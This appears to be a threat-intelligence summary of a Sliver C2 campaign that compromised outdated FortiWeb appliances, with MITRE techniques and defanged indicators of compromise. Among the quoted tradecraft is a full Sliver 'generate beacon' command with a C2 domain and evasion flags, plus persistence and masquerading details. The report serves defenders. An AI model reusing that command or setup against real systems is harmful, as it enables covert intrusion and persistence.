Where is the EDR? Sliver C2 running from firewalls

Researchers discovered exposed Sliver C2 databases and logs in open directories, linking a threat actor that exploited multiple FortiWeb appliances and used React2Shell (CVE-2025-55182) to deploy Sliver and FRP and expose local services. Analysis shows Sliver implants, C2 domains, FRP and a renamed microsocks proxy (cups-lpd) persisted via systemd/supervisord on outdated FortiWeb devices, highlighting a major visibility blind spot. #Sliver #FortiWeb

Keypoints

  • Exposed Sliver C2 databases and logs were found in open directories indexed by Censys, revealing detailed operator activity and victim metadata.
  • The threat actor achieved initial access by exploiting public-facing vulnerabilities, notably using React2Shell (CVE-2025-55182) and multiple outdated FortiWeb appliances.
  • Multiple Sliver C2 domains (e.g., ns1.ubunutpackages[.]store, ns1.bafairforce[.]army) and implants with recorded SHA256 hashes and timestamps were recovered; 30 unique real hosts were onboarded in eight days.
  • Sliver implants were deployed to FortiWeb paths such as /bin/.root/system-updater (and one non-FortiWeb host at /app/web/system-updater), with victims across Bangladesh, Pakistan, the US and others.
  • Persistence was achieved via Systemd service files (updater.service, T1543.002) and modified supervisord configs; a renamed microsocks proxy (cups-lpd) exposed SOCKS on port 515 with hardcoded credentials.
  • The operator used Fast Reverse Proxy (frp) infrastructure (frps/frpc) hosted at 45.83.181[.]160 to proxy and expose internal victim services, corroborated by Sliver beacon databases.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Initial access achieved via exploitation of public-facing vulnerabilities: ‘gained initial access via exploitation of public facing vulnerabilities’.
  • [T1071.001] Application Layer Protocol: Web Protocols – Sliver used HTTP beacons to C2 as shown in the Sliver generate command: ‘generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60’.
  • [T1543] Create or Modify System Process – The actor modified system process configurations to persist their tooling: ‘modification of system processes (T1543)’.
  • [T1543.002] Systemd Service – Persistence was implemented via a systemd service file for the updater binary: ‘Systemd Service (T1543.002)’.
  • [T1090] Proxy – The operator deployed proxying tooling to expose internal services remotely using FRP: ‘the Fast Reverse Proxy (frp) was leveraged’.
  • [T1036] Masquerading – The actor renamed and disguised a proxy binary to appear as a legitimate service (CUPS): ‘renamed microsocks binary (cups-lpd), bound to port 515 to masquerade as CUPS, running from a Systemd service on the FortiWeb appliance’.

Indicators of Compromise

  • [Domain] Sliver C2 and decoy sites – ns1.ubunutpackages[.]store, ns1.bafairforce[.]army
  • [IP address] C2 and FRP infrastructure – 195.20.17[.]253, 193.233.201[.]12, and five more: 45.150.108[.]43, 80.78.18[.]142, 192.81.210[.]81, 45.143.167[.]7, 45.83.181[.]160
  • [File hash (SHA256)] Sliver implants and proxy binary – 2897ee24de4cca2a4c6a085cf6fdccb6a89c6c23978529d81b4f4e6db46b0b96, 4086057b9a0f9898c07318e093814ae9cfdaaf6ad71a45b2d0d4cd75e57f9354, and 4 more hashes.
  • [File name] Deployed binaries and service files – /bin/.root/system-updater, cups_lpd (cups-lpd) and other service/config files (updater.service, supervisor.conf).
  • [URL] FRP configuration and C2 endpoints – hXXp://45.83.181[.]160:8003/frpc.toml, https://ns1.ubunutpackages[.]store
  • [Credentials] Hardcoded credential observed in proxy binary metadata – Monkhood6703:64d9cb9c5f075dfaa371a6f


Read more: https://ctrlaltintel.com/threat%20research/FortiWeb-Sliver/